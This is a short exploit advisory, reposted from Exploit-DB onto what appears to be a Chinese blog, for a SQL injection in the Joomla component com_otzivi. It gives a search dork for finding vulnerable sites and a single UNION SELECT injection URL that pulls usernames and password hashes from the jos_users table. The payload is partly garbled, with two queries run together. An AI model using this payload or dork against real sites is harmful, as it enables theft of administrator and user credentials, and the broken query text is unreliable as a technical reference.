Joomla! Component com_otzivi – Blind SQL Injection - 体验盒子

作者： Cyber_945

日期： 2010-01-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/10966/

<------------------- header data start ------------------- >
#############################################################
#Joomla Component com_otzivi Blind SQL Injection Vulnerability
#############################################################
# Author: Cyber_945
# Home: Ar-ge.Org
# Greetz: By.Danger,D3xer,LionTurk and All Ar-ge.Org Members
# Not3: Ar-ge.Org Online
# Name: com_otzivi
# Bug Type: Blind SQL Injection
# Infection : Adminin bilgileri alinabilir.
Dork :: inurl:/index.php?option=com_otzivi

#############################################################
=======================C=y=b=e=r=_=9=4=5================
< 


-- bug code start -- >
http://server/index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users--

=======================C=y=b=e=r=_=9=4=5================